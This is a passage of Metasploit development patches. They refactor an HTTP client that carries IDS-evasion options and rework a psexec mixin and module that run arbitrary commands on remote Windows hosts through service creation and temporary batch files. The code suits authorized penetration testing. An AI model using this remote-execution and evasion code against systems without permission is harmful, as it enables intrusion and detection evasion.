+ end + + vars_get.each_pair do |var,val| + qstr << '&' if qstr.length > 0 + qstr << (encode_params ? set_encode_uri(var) : var) + qstr << '=' + qstr << (encode_params ? set_encode_uri(val) : val) + end + + if (config['pad_post_params']) + 1.upto(config['pad_post_params_count'].to_i) do |i| + rand_var = Rex::Text.rand_text_alphanumeric(rand(32)+1) + rand_val = Rex::Text.rand_text_alphanumeric(rand(32)+1) + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(rand_var) : rand_var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(rand_val) : rand_val) + end + end + + vars_post.each_pair do |var,val| + pstr << '&' if pstr.length > 0 + pstr << (encode_params ? set_encode_uri(var) : var) + pstr << '=' + pstr << (encode_params ? set_encode_uri(val) : val) + end + else + uri_str = set_uri + if encode + qstr = set_encode_uri(qstr) + end + end + + req = '' + req << set_method + req << set_method_uri_spacer() + req << set_uri_prepend() + + if encode + req << set_encode_uri(uri_str) + else + req << uri_str + end + + + if (qstr.length > 0) + req << '?' + req << qstr + end + + req << set_path_info + req << set_uri_append() + req << set_uri_version_spacer() + req << set_version + req << set_host_header + + # If an explicit User-Agent header is set, then use that instead of the value of user_agent + unless headers.keys.map{|x| x.downcase }.include?('user-agent') + req << set_agent_header + end + + if authorization + req << set_auth_header + end + + req << set_cookie_header + req << set_connection_header + req << set_extra_headers + + req << set_content_type_header + req << set_content_len_header(pstr.length) + req << set_chunked_header() + req << raw_headers + req << set_body(pstr) + end + + protected + + def set_auth_header + "Authorization: " + authorization + end + + def set_uri + if (config['uri_dir_self_reference']) + uri.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." * cnt) + buf << "/" + part + end + uri = buf + end + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << ((self.port == 80) ? "" : ":#{self.port}") + url << uri + url + else + uri + end + end + + def set_cgi + uri_str = uri + if (config['uri_dir_self_reference']) + uri_str.gsub!('/', '/./') + end + + if (config['uri_dir_fake_relative']) + buf = "" + uri_str.split('/').each do |part| + cnt = rand(8)+2 + 1.upto(cnt) { |idx| + buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) + } + buf << ("/.." * cnt) + buf << "/" + part + end + uri_str = buf + end + + url = uri_str + + if (config['uri_full_url']) + url = self.ssl ? "https" : "http" + url << self.config['vhost'] + url << (self.port == 80) ? "" : ":#{self.port}" + url << uri_str + end + + url + end + + def set_encode_uri(str) + a = str + config['uri_encode_count'].times { + a = Rex::Text.uri_encode(a, config['uri_encode_mode']) + } + return a + end + + def set_method + ret = method + + if (config['method_random_valid']) + ret = ['GET', 'POST', 'HEAD'][rand(3)] + end + + if (config['method_random_invalid']) + ret = Rex::Text.rand_text_alpha(rand(20)+1) + end + + if (config['method_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret + end + + def set_method_uri_spacer + len = config['pad_method_uri_count'].to_i + set = " " + buf = "" + + case config['pad_method_uri_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the padding to place before the uri + # + def set_uri_prepend + prefix = "" + + if (config['uri_fake_params_start']) + prefix << '/%3fa=b/../' + end + + if (config['uri_fake_end']) + prefix << '/%20HTTP/1.0/../../' + end + + prefix + end + + # + # Return the HTTP path info + # TODO: + # * Encode path information + def set_path_info + path ? path : '' + end + + # + # Return the padding to place before the uri + # + def set_uri_append + # TODO: + # * Support different padding types + "" + end + + # + # Return the spacing between the uri and the version + # + def set_uri_version_spacer + len = config['pad_uri_version_count'].to_i + set = " " + buf = "" + + case config['pad_uri_version_type'] + when 'tab' + set = "\t" + when 'apache' + set = "\t \x0b\x0c\x0d" + end + + while(buf.length < len) + buf << set[ rand(set.length) ] + end + + return buf + end + + # + # Return the HTTP version string + # + def set_version + ret = protocol + "/" + version + + if (config['version_random_valid']) + ret = protocol + "/" + ['1.0', '1.1'][rand(2)] + end + + if (config['version_random_invalid']) + ret = Rex::Text.rand_text_alphanumeric(rand(20)+1) + end + + if (config['version_random_case']) + ret = Rex::Text.to_rand_case(ret) + end + + ret << "\r\n" + end + + # + # Return the HTTP Host header + # + def set_host_header + return "" if config['uri_full_url'] + host ||= config['vhost'] + + # IPv6 addresses must be placed in brackets + if Rex::Socket.is_ipv6?(host) + host = "[#{host}]" + end + + # The port should be appended if non-standard + if not [80,443].include?(port) + host = host + ":#{port}" + end + + set_formatted_header("Host", host) + end + + # + # Return the HTTP agent header + # + def set_agent_header + user_agent ? set_formatted_header("User-Agent", user_agent) : "" + end + + # + # Return a formatted header string + # + def set_formatted_header(var, val) + if (self.config['header_folding']) + "#{var}:\r\n\t#{val}\r\n" + else + "#{var}: #{val}\r\n" + end + end + + # + # Return the HTTP cookie header + # + def set_cookie_header + cookie ? set_formatted_header("Cookie", cookie) : "" + end + + # + # Return the HTTP connection header + # + def set_connection_header + connection ? set_formatted_header("Connection", connection) : "" + end + + # + # Return the content type header + # + def set_content_type_header + set_formatted_header("Content-Type", content_type) + end + + # + # Return the content length header + def set_content_len_header(clen) + return "" if config['chunked_size'] > 0 + set_formatted_header("Content-Length", clen) + end + + # + # Return a string of formatted extra headers + # + def set_extra_headers + buf = '' + + if (config['pad_fake_headers']) + 1.upto(config['pad_fake_headers_count'].to_i) do |i| + buf << set_formatted_header( + Rex::Text.rand_text_alphanumeric(rand(32)+1), + Rex::Text.rand_text_alphanumeric(rand(32)+1) + ) + end + end + + headers.each_pair do |var,val| + buf << set_formatted_header(var, val) + end + + buf + end + + def set_chunked_header + return "" if config['chunked_size'] == 0 + set_formatted_header('Transfer-Encoding', 'chunked') + end + + # + # Return the HTTP seperator and body string + # + def set_body(bdata) + return "\r\n" + bdata if config['chunked_size'] == 0 + str = bdata.dup + chunked = '' + while str.size > 0 + chunk = str.slice!(0,rand(config['chunked_size']) + 1) + chunked << sprintf("%x", chunk.size) + "\r\n" + chunk + "\r\n" + end + "\r\n" + chunked + "0\r\n\r\n" + end + + +end + + + +end +end +end \ No newline at end of file From 87d9af585eada1536c65fdb7dc53759fb687f6a3 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Sun, 17 Feb 2013 21:35:19 -0600 Subject: [PATCH 10/87] fix request_raw --- lib/rex/proto/http/client.rb | 79 ++++++++-------------------- lib/rex/proto/http/client_request.rb | 15 ++++-- 2 files changed, 33 insertions(+), 61 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 690cd58f4d..0244a9eb3e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http @@ -171,62 +169,27 @@ class Client # # @return [Request] def request_raw(opts={}) - c_ag = opts['agent'] || config['agent'] - c_auth = opts['basic_auth'] || config['basic_auth'] || '' - c_body = opts['data'] || '' - c_conn = opts['connection'] - c_cook = opts['cookie'] || config['cookie'] - c_enc = opts['encode'] || false - c_head = opts['headers'] || config['headers'] || {} - c_host = opts['vhost'] || config['vhost'] || self.hostname - c_meth = opts['method'] || 'GET' - c_prot = opts['proto'] || 'HTTP' - c_qs = opts['query'] - c_rawh = opts['raw_headers']|| config['raw_headers'] || '' - c_uri = opts['uri'] || '/' - c_vers = opts['version'] || config['version'] || '1.1' + opts['agent'] ||= config['agent'] + opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' + opts['data'] ||= '' + opts['uri'] ||= '/' + opts['cookie'] ||= config['cookie'] + opts['encode'] ||= false + opts['headers'] ||= config['headers'] || {} + opts['vhost'] ||= config['vhost'] + opts['method'] ||= 'GET' + opts['proto'] ||= 'HTTP' + opts['query'] ||= '' + opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' + opts['version'] = opts['version'] || config['version'] || '1.1' + opts['cgi'] = false + opts['port'] = self.port - # An agent parameter was specified, but so was a header, prefer the header - if c_ag and c_head.keys.map{|x| x.downcase }.include?('user-agent') - c_ag = nil + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) end - uri = set_uri(c_uri) - - req = '' - req << set_method(c_meth) - req << set_method_uri_spacer() - req << set_uri_prepend() - req << (c_enc ? set_encode_uri(uri) : uri) - - if (c_qs) - req << '?' - req << (c_enc ? set_encode_qs(c_qs) : c_qs) - end - - req << set_uri_append() - req << set_uri_version_spacer() - req << set_version(c_prot, c_vers) - req << set_host_header(c_host) - req << set_agent_header(c_ag) - - if (c_auth.length > 0) - unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" - req << set_basic_auth_header(c_auth) - end - end - - req << set_cookie_header(c_cook) - req << set_connection_header(c_conn) - req << set_extra_headers(c_head) - req << set_raw_headers(c_rawh) - req << set_body(c_body) - - request = Request.new - request.parse(req) - request.options = opts - - request + req = ClientRequest.new(opts,self.config) end @@ -267,6 +230,10 @@ class Client opts['encode_params'] = false end + if opts['basic_auth'] and not opts['authorization'] + opts['authorization'] = Rex::Text.encode_base64(opts['basic_auth']) + end + req = ClientRequest.new(opts,self.config) end @@ -322,7 +289,7 @@ class Client def send_recv(req, t = -1, persist=false) res = _send_recv(req,t,persist) if res and res.code == 401 and res.headers['WWW-Authenticate'] and have_creds? - res = send_auth(res, req.options, t, persist) + res = send_auth(res, req.opts, t, persist) end res end diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index cb76327f2b..c24d9a8c4a 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -2,6 +2,7 @@ require 'uri' require 'rex/proto/http' + module Rex module Proto module Http @@ -31,6 +32,8 @@ class ClientRequest attr_accessor :vars_post attr_accessor :version + attr_reader :opts + def initialize(opts={}, client_config) @cgi = opts['cgi'] @config = client_config @@ -53,6 +56,7 @@ class ClientRequest @vars_get = opts['vars_get'] @vars_post = opts['vars_post'] @version = opts['version'] + @opts = opts end def to_s @@ -156,13 +160,14 @@ class ClientRequest end def set_uri + uri_str = uri if (config['uri_dir_self_reference']) - uri.gsub!('/', '/./') + uri_str.gsub!('/', '/./') end if (config['uri_dir_fake_relative']) buf = "" - uri.split('/').each do |part| + uri_str.split('/').each do |part| cnt = rand(8)+2 1.upto(cnt) { |idx| buf << "/" + Rex::Text.rand_text_alphanumeric(rand(32)+1) @@ -170,17 +175,17 @@ class ClientRequest buf << ("/.." * cnt) buf << "/" + part end - uri = buf + uri_str = buf end if (config['uri_full_url']) url = self.ssl ? "https" : "http" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") - url << uri + url << uri_str url else - uri + uri_str end end From b72d2b59f84ae70978f416c65cf303f5fa3007f0 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 18 Feb 2013 18:02:51 -0600 Subject: [PATCH 11/87] Add logging in case of exceptions during rm --- lib/msf/core/exploit/file_dropper.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 6298354b67..12ef03efb2 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -56,7 +56,7 @@ module Exploit::FileDropper # # Record file as needing to be cleaned up # - # @param [Array] files List of paths on the target that should + # @param files [Array] List of paths on the target that should # be deleted during cleanup. Each filename should be either a full # path or relative to the current working directory of the session # (not necessarily the same as the cwd of the server we're @@ -95,7 +95,9 @@ module Exploit::FileDropper true #rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE, ::Rex::Post::Meterpreter::RequestError => e rescue ::Exception => e - vprint_error("Failed to delete #{file}: #{e.to_s}") + vprint_error("Failed to delete #{file}: #{e}") + elog("Failed to delete #{file}: #{e.class}: #{e}") + elog("Call stack:\n#{e.backtrace.join("\n")}") false end end From 867ab2f269365d7c0de0591c2a96e64c7928d5d9 Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 18 Feb 2013 19:01:03 -0600 Subject: [PATCH 12/87] Whitespace --- lib/rex/proto/smb/client.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index bec1ff50d5..72c35379fb 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1899,7 +1899,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils resp = find_next(last_search_id, last_offset, last_filename) search_next = 1 # Flip bit so response params will parse correctly end - end until eos != 0 or last_offset == 0 + end until eos != 0 or last_offset == 0 rescue ::Exception raise $! end From 49f00acc1187f38a55fcaa5cd31b081575dc19b3 Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 19 Feb 2013 11:24:05 -0600 Subject: [PATCH 13/87] Fix nil deref when dnsdomain is empty --- modules/auxiliary/scanner/smb/psexec_loggedin_users.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 7ed1b96f4d..ca6c2f5c2f 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -164,8 +164,10 @@ class Metasploit3 < Msf::Auxiliary print_good("#{peer} - #{user}") report_user(user.chomp) else - if username = query_session(smbshare, ip, cmd, text, bat) - user = dnsdomain.split(" ")[2].split(".")[0].to_s + "\\" + username.to_s + username = query_session(smbshare, ip, cmd, text, bat) + if username + hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." + user = "#{hostname}\\#{username}" print_good("#{peer} - #{user}") report_user(user.chomp) else @@ -175,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary else print_status("#{peer} - Could not determine logged in users") end - rescue StandardError => check_error + rescue Rex::Proto::SMB::Exceptions::Error => check_error print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") return check_error end From ede804e6affa6ae24e8c62a22e01430b3e6d6aed Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 19 Feb 2013 12:33:19 -0600 Subject: [PATCH 14/87] Make psexec mixin a bit better * Removes copy-pasted code from psexec_command module and uses the mixin instead * Uses the SMB protocol to delete files rather than psexec'ing to call cmd.exe and del * Replaces several instances of "rescue StandardError" with better exception handling so we don't accidentally swallow things like NoMethodError * Moves file reading and existence checking into the Exploit::SMB mixin --- lib/msf/core/exploit/psexec.rb | 139 ++++------- lib/msf/core/exploit/smb.rb | 66 +++++- modules/auxiliary/admin/smb/psexec_command.rb | 221 ++++-------------- 3 files changed, 149 insertions(+), 277 deletions(-) diff --git a/lib/msf/core/exploit/psexec.rb b/lib/msf/core/exploit/psexec.rb index f63a93f8e1..58e6788695 100644 --- a/lib/msf/core/exploit/psexec.rb +++ b/lib/msf/core/exploit/psexec.rb @@ -1,11 +1,14 @@ require 'msf/core' +require 'msf/core/exploit/dcerpc' module Msf #### -# This module alows for reuse of the psexec code execution module -# This code was stolen straight out of psexec.rb.Thanks very much for all -# who contributed to that module!! Instead of uploading and runing a binary. +# Allows for reuse of the psexec code execution technique +# +# This code was stolen straight out of the psexec module. Thanks very +# much for all who contributed to that module!! Instead of uploading +# and runing a binary. #### module Exploit::Remote::Psexec @@ -13,34 +16,42 @@ module Exploit::Remote::Psexec include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB - # Retrives output from the executed command + # # @param smbshare [String] The SMBshare to connect to. Usually C$ - # @param ip [IP Address] Remote Host to Connect To - # @param file [File name] Path to the output file relative to the smbshare - # Example: '\WINDOWS\Temp\outputfile.txt' - # @return output or nil if fails - def get_output(smbshare, ip, file) + # @param host [String] Remote host to connect to, as an IP address or + # hostname + # @param file [String] Path to the output file relative to the smbshare + # Example: '\WINDOWS\Temp\outputfile.txt' + # @return [String,nil] output or nil on failure + def smb_read_file(smbshare, host, file) begin - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return output - rescue Rex::Proto::SMB::Exceptions::ErrorCode => output_error - print_error("#{peer} - The file #{file} doesn't exist. #{output_error}.") + simple.connect("\\\\#{host}\\#{smbshare}") + file = simple.open(file, 'ro') + contents = file.read + file.close + simple.disconnect("\\\\#{host}\\#{smbshare}") + return contents + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") return nil end end - # This method executes a single windows command. If you want to - # retrieve the output of your command you'll have to echo it - # to a .txt file and then use the get_output method to retrieve it - # Make sure to use the cleanup_after method when you are done. + # Executes a single windows command. + # + # If you want to retrieve the output of your command you'll have to + # echo it to a .txt file and then use the {#smb_read_file} method to + # retrieve it. Make sure to remove the files manually or use + # {Exploit::FileDropper#register_files_for_cleanup} to have the + # {Exploit::FileDropper#cleanup} and + # {Exploit::FileDropper#on_new_session} handlers do it for you. + # + # @todo Figure out the actual exceptions this needs to deal with + # instead of all the ghetto "rescue ::Exception" madness # @param command [String] Should be a valid windows command - # @return true if everything wen't well + # @return [Boolean] Whether everything went well def psexec(command) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) @@ -49,8 +60,7 @@ module Exploit::Remote::Psexec vprint_status("#{peer} - Bound to #{handle} ...") vprint_status("#{peer} - Obtaining a service manager handle...") scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) + stubdata = NDR.uwstring("\\\\#{rhost}") + NDR.long(0) + NDR.long(0xF003F) begin response = dcerpc.call(0x0f, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -66,19 +76,19 @@ module Exploit::Remote::Psexec svc_handle = nil svc_status = nil stubdata = - scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # Start: Demand - NDR.long(0x00000000) + # Errors: Ignore - NDR.wstring( command ) + - NDR.long(0) + # LoadOrderGroup - NDR.long(0) + # Dependencies - NDR.long(0) + # Service Start - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) + # Password - NDR.long(0) # Password + scm_handle + NDR.wstring(servicename) + NDR.uwstring(displayname) + + NDR.long(0x0F01FF) + # Access: MAX + NDR.long(0x00000110) + # Type: Interactive, Own process + NDR.long(0x00000003) + # Start: Demand + NDR.long(0x00000000) + # Errors: Ignore + NDR.wstring( command ) + + NDR.long(0) + # LoadOrderGroup + NDR.long(0) + # Dependencies + NDR.long(0) + # Service Start + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) + # Password + NDR.long(0) # Password begin vprint_status("#{peer} - Creating the service...") response = dcerpc.call(0x0c, stubdata) @@ -97,8 +107,7 @@ module Exploit::Remote::Psexec end vprint_status("#{peer} - Opening service...") begin - stubdata = - scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) + stubdata = scm_handle + NDR.wstring(servicename) + NDR.long(0xF01FF) response = dcerpc.call(0x10, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil svc_handle = dcerpc.last_response.stub_data[0,20] @@ -108,8 +117,7 @@ module Exploit::Remote::Psexec return false end vprint_status("#{peer} - Starting the service...") - stubdata = - svc_handle + NDR.long(0) + NDR.long(0) + stubdata = svc_handle + NDR.long(0) + NDR.long(0) begin response = dcerpc.call(0x13, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -119,8 +127,7 @@ module Exploit::Remote::Psexec return false end vprint_status("#{peer} - Removing the service...") - stubdata = - svc_handle + stubdata = svc_handle begin response = dcerpc.call(0x02, stubdata) if dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil @@ -139,52 +146,6 @@ module Exploit::Remote::Psexec return true end - - # This method is called by file_dropper to remove files droped - # By your module - # - # @example - # file_rm('C:\WINDOWS\Temp\output.txt') - # - # @param file [String] Full path to a file on the remote host - # @return [StandardError] only in the event of an error - def file_rm(file) - delete = "%COMSPEC% /C del #{file}" - vprint_status("#{peer} - Deleting #{file}") - psexec(delete) - end - - - # This method stores files in an Instance array - # The files are then deleted from the remote host once - # the cleanup_after method is called - # - # @example - # register_file_for_cleanup("C:\\WINDOWS\\Temp\\output.txt") - # @param file [String] Full path to the file on the remote host - def register_file_for_cleanup(*file) - @dropped_files ||= [] - @dropped_files += file - end - - - # This method removes any files that were dropped on the remote system - # and marked with the register_file_for_cleanup method - def cleanup_after - print_status("#{peer} - Removing files dropped by your module/exploit") - if !@dropped_files - return - end - begin - @dropped_files.delete_if do |file| - file_rm(file) - print_good("#{peer} - Deleted #{file}") - end - rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanup_error - print_error("#{peer} - Unable to delte #{file}. #{cleanup_error}") - end - end - end end diff --git a/lib/msf/core/exploit/smb.rb b/lib/msf/core/exploit/smb.rb index 00f17808c1..f249af1ed2 100644 --- a/lib/msf/core/exploit/smb.rb +++ b/lib/msf/core/exploit/smb.rb @@ -18,6 +18,8 @@ module Msf module Exploit::Remote::SMB + require 'msf/core/exploit/psexec' + include Exploit::Remote::Tcp include Exploit::Remote::NTLM::Client @@ -90,6 +92,13 @@ module Exploit::Remote::SMB register_autofilter_services(%W{ netbios-ssn microsoft-ds }) end + # Override {Exploit::Remote::Tcp#connect} to setup an SMB connection + # and configure evasion options + # + # Also populates {#simple}. + # + # @param (see Exploit::Remote::Tcp#connect) + # @return (see Exploit::Remote::Tcp#connect) def connect(global=true) disconnect() if global @@ -132,7 +141,12 @@ module Exploit::Remote::SMB Rex::Text.to_unicode(str) end - # This method establishes a SMB session over the default socket + # Establishes an SMB session over the default socket and connects to + # the IPC$ share. + # + # You should call {#connect} before calling this + # + # @return [void] def smb_login simple.login( datastore['SMBName'], @@ -217,13 +231,55 @@ module Exploit::Remote::SMB end end + # Whether a remote file exists + # + # @param file [String] Path to a file to remove, relative to the + # most-recently connected share + # @raise [Rex::Proto::SMB::Exceptions::ErrorCode] + def smb_file_exist?(file) + begin + fd = simple.open(file, 'ro') + rescue XCEPT::ErrorCode => e + # If attempting to open the file results in a "*_NOT_FOUND" error, + # then we can be sure the file is not there. + # + # Copy-pasted from smb/exceptions.rb to avoid the gymnastics + # required to pull them out of a giant inverted hash + # + # 0xC0000034 => "STATUS_OBJECT_NAME_NOT_FOUND", + # 0xC000003A => "STATUS_OBJECT_PATH_NOT_FOUND", + # 0xC0000225 => "STATUS_NOT_FOUND", + error_is_not_found = [ 0xC0000034, 0xC000003A, 0xC0000225 ].include?(e.error_code) + # If the server returns some other error, then there was a + # permissions problem or some other difficulty that we can't + # really account for and hope the caller can deal with it. + raise e unless error_is_not_found + found = !error_is_not_found + else + # There was no exception, so we know the file is openable + fd.close + found = true + end + + found + end + + # Remove remote file + # + # @param file (see #smb_file_exist?) + # @return [void] + def smb_file_rm(file) + fd = smb_open(file, 'ro') + fd.delete + end + # # Fingerprinting methods # - # This method the EnumPrinters() function of the spooler service + # Calls the EnumPrinters() function of the spooler service def smb_enumprinters(flags, name, level, blen) stub = NDR.long(flags) + @@ -632,10 +688,7 @@ module Exploit::Remote::SMB fprint end - # - # Accessors - # - + # @return [Rex::Proto::SMB::SimpleClient] attr_accessor :simple end @@ -785,7 +838,6 @@ module Exploit::Remote::SMBServer c.put(pkt.to_s) end - end diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 1bc21c97c3..15e51b112e 100644 --- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -4,12 +4,12 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary - # Exploit mixins should be called first + include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::Psexec include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner - include Msf::Exploit::Remote::DCERPC # Aliases for common classes SIMPLE = Rex::Proto::SMB::SimpleClient @@ -58,213 +58,72 @@ class Metasploit3 < Msf::Auxiliary # This is the main controle method def run_host(ip) text = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.txt" - bat = "%WINDIR%\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" - smbshare = datastore['SMBSHARE'] + bat = "\\#{datastore['WINPATH']}\\Temp\\#{Rex::Text.rand_text_alpha(16)}.bat" + @smbshare = datastore['SMBSHARE'] + @ip = ip - #Try and authenticate with given credentials + # Try and authenticate with given credentials if connect begin smb_login - rescue StandardError => autherror + rescue Rex::Proto::SMB::Exceptions::Error => autherror print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}") return end - if execute_command(ip, text, bat) - get_output(smbshare, ip, text) + if execute_command(text, bat) + get_output(text) end - cleanup_after(smbshare, ip, text, bat) + cleanup_after(text, bat) disconnect end end # Executes specified Windows Command - def execute_command(ip, text, bat) + def execute_command(text, bat) + # Try and execute the provided command + execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start %COMSPEC% /C #{bat}" + print_status("#{peer} - Executing the command...") begin - #Try and execute the provided command - execute = "%COMSPEC% /C echo #{datastore['COMMAND']} ^> %SYSTEMDRIVE%#{text} > #{bat} & %COMSPEC% /C start cmd.exe /C #{bat}" - print_status("#{peer} - Executing the command...") return psexec(execute) - rescue StandardError => exec_command_error + rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error print_error("#{peer} - Unable to execute specified command: #{exec_command_error}") return false end end # Retrive output from command - def get_output(smbshare, ip, file) - begin - print_status("#{peer} - Getting the command output...") - simple.connect("\\\\#{ip}\\#{smbshare}") - outfile = simple.open(file, 'ro') - output = outfile.read - outfile.close - simple.disconnect("\\\\#{ip}\\#{smbshare}") - if output.empty? - print_status("#{peer} - Command finished with no output") - return - end - print_good("#{peer} - Command completed successfuly! Output:\r\n#{output}") - return - rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + def get_output(file) + print_status("#{peer} - Getting the command output...") + output = smb_read_file(@smbshare, @ip, file) + if output.nil? + print_error("#{peer} - Error getting command output. #{$!.class}. #{$!}.") return end + if output.empty? + print_status("#{peer} - Command finished with no output") + return + end + print_good("#{peer} - Command completed successfuly! Output:") + print_line("#{output}") end - # This is the cleanup method, removes .txt and .bat file/s created during execution- - def cleanup_after(smbshare, ip, text, bat) - begin - # Try and do cleanup command - cleanup = "%COMSPEC% /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup...") - psexec(cleanup) - if !check_cleanup(smbshare, ip, text) - print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{text} and #{bat} from the target.") - else - print_status("#{peer} - Cleanup was successful") + # Removes files created during execution. + def cleanup_after(*files) + simple.connect("\\\\#{@ip}\\#{@smbshare}") + print_status("#{peer} - Executing cleanup...") + files.each do |file| + begin + smb_file_rm(file) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => cleanuperror + print_error("#{peer} - Unable to cleanup #{file}. Error: #{cleanuperror}") end - rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands. Error: #{cleanuperror}") - print_error("#{peer} - Maybe you'll need to manually remove #{text} and #{bat} from the target") - return cleanuperror end - end - - def check_cleanup(smbshare, ip, text) - simple.connect("\\\\#{ip}\\#{smbshare}") - begin - if checktext = simple.open(text, 'ro') - check = false - else - check = true - end - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return check - rescue StandardError => check_error - simple.disconnect("\\\\#{ip}\\#{smbshare}") - return true + left = files.collect{ |f| smb_file_exist?(f) } + if left.any? + print_error("#{peer} - Unable to cleanup. Maybe you'll need to manually remove #{left.join(", ")} from the target.") + else + print_status("#{peer} - Cleanup was successful") end end - # This code was stolen straight out of psexec.rb. Thanks very much HDM and all who contributed to that module!! - # Instead of uploading and runing a binary. This method runs a single windows command fed into the COMMAND paramater - def psexec(command) - - simple.connect("\\\\#{datastore['RHOST']}\\IPC$") - - handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") - dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - - vprint_status("#{peer} - Obtaining a service manager handle...") - scm_handle = nil - stubdata = - NDR.uwstring("\\\\#{rhost}") + - NDR.long(0) + - NDR.long(0xF003F) - begin - response = dcerpc.call(0x0f, stubdata) - if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil) - scm_handle = dcerpc.last_response.stub_data[0,20] - end - rescue ::Exception => e - print_error("#{peer} - Error: #{e}") - return false - end - - servicename = Rex::Text.rand_text_alpha(11) - displayname = Rex::Text.rand_text_alpha(16) - holdhandle = scm_handle - svc_handle = nil - svc_status = nil - - stubdata = - scm_handle + - NDR.wstring(servicename) + - NDR.uwstring(displayname) + - - NDR.long(0x0F01FF) + # Access: MAX - NDR.long(0x00000110) + # Type: Interactive, Own process - NDR.long(0x00000003) + # 